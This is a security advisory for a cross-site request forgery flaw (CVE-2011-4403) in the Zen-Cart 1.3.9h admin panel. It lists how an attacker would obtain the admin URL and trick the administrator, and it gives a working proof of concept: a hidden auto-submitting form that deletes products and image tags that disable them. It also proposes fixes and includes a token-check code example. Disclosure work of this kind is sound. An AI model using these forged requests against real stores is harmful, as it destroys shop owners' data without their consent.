Zen-Cart 1.3.9h Cross Site Request Forgery

2012-02-11T00:00:00
ID PACKETSTORM:109676
Type packetstorm
Reporter DisK0nn3cT
Modified 2012-02-11T00:00:00

Description

                                            `*Advisory Information*  
  
Title: Zen-Cart Admin CSRF/XSRF - Delete / Disable Products  
Date published: 2012-02-10 01:59:45 AM  
upSploit Ref: UPS-2011-0018  
  
CVE REF: CVE-2011-4403  
  
*Advisory Summary*  
  
An attacker can force an administrator's browser to delete or disable products
in the administrator's own store.
  
*Vendor*  
  
Zen-Cart  
  
*Affected Software*  
  
Zen-Cart v1.3.9h  
  
Zen Cart™ truly is the art of e-commerce; free, user-friendly, open source  
shopping cart software. The ecommerce web site design program is being  
developed by a group of like-minded shop owners, programmers, designers,  
and consultants that think ecommerce web design could be and should be done  
differently.  
  
*Description of Issue*  
  
This is a proof of concept for CSRF in the Zen-Cart 1.3.9h admin control panel.
By getting the administrator's browser to submit this form from any origin, an
attacker can cause the administrator to delete or disable products in his own store.
  
*PoC*  
  
Requirements

1. The admin user (target) must have a valid session id. Even if they have
closed the admin window, the attack still succeeds.
2. The attacker must obtain the admin URL, for example via:
* social engineering an admin user (tricking them)
* packet capture
* email headers
* an invoice print-out
* * I know these have been addressed in your security forum topics,
but most users are not aware of these issues
3. The attacker must obtain the product id
* This is public information
4. The attacker must then social engineer the admin (trick them) into loading the page, for example via:
* an email with images
* a forum topic containing the images
* a link to a page on the attacker's server
  
Proof of Concept  
  
Delete:  
  
This form can be hidden and made to submit automatically on page load:  
  
<form name="products" action="http://www.mysite.com/path_to_admin/product.php?action=delete_product_confirm" method="post">
<label for="securityToken">Security Token</label><br/><input type="text" name="securityToken" value="Can be anything " /><br/><br/>
<label for="products_id">Products ID</label><br/><input type="text" name="products_id" value="329"><br/><br/>
<label for="product_categories[]">Products Category</label><br/><input type="text" value="48" name="product_categories[]"><br/><br/>
<input type="submit" value=" Delete Product">
</form>
  
Disable:  
  
<img src="http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=1"/>
<img src="http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=2"/>
<img src="http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=3"/>
<img src="http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=4"/>
<img src="http://www.mysite.com/path_to_admin/categories.php?action=setflag&flag=0&pID=5"/>
  
Proposed Solution  
  
* Add the security token conditional check to delete_product_confirm.php
for all product types
* Apply this check to all requests made within the admin control panel
rather than just key operations
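
The following is an added illustration of the proposed fix and is not Zen-Cart's own code: a per-session anti-CSRF token that every state-changing admin action must carry in a POST body, so that both the forged form (any value in securityToken) and the bare <img> GET requests shown in the PoC are rejected. The function names, the session key and the action dispatch are assumptions for the example.

```php
<?php
// Added example (not Zen-Cart's own code). Names and session key are assumptions.
session_start();

// Issue one unguessable token per admin session; reuse it so that working
// in several admin tabs at once keeps functioning.
function admin_security_token(): string
{
    if (empty($_SESSION['securityToken'])) {
        $_SESSION['securityToken'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['securityToken'];
}

// Constant-time comparison; a missing, empty or mismatched token fails closed.
function admin_token_is_valid($supplied): bool
{
    if (!is_string($supplied) || $supplied === '' || empty($_SESSION['securityToken'])) {
        return false;
    }
    return hash_equals($_SESSION['securityToken'], $supplied);
}

// Gate for state-changing admin actions (delete_product_confirm, setflag, ...).
// The token is read from POST only, so a GET such as
// categories.php?action=setflag&flag=0&pID=1 loaded via <img> can never pass,
// and a forged form with an arbitrary securityToken value fails hash_equals().
function require_admin_token(): void
{
    if ($_SERVER['REQUEST_METHOD'] !== 'POST'
        || !admin_token_is_valid($_POST['securityToken'] ?? null)) {
        http_response_code(403);
        error_log('admin CSRF check failed for action=' . ($_GET['action'] ?? '(none)'));
        exit('Invalid security token; please reload the admin page and try again.');
    }
}

// Hidden field to embed in every legitimate admin form.
function admin_token_field(): string
{
    return '<input type="hidden" name="securityToken" value="'
         . htmlspecialchars(admin_security_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Assumed dispatch, applied to every mutating action rather than only key ones.
$action = $_GET['action'] ?? '';
if (in_array($action, ['delete_product_confirm', 'setflag'], true)) {
    require_admin_token();
    // ... perform the deletion or flag change only after the check passes ...
}
```

Legitimate admin pages render admin_token_field() inside each form; the administrator's browser still carries the session cookie to a forged request, but without the token in the POST body the action is refused and logged.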
  
*Credits*  
  
DisK0nn3cT  
  
*References*  
  
http://www.zen-cart.com/  
http://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)  
  
*Patch/Fix*  
  
Update to the latest version  
`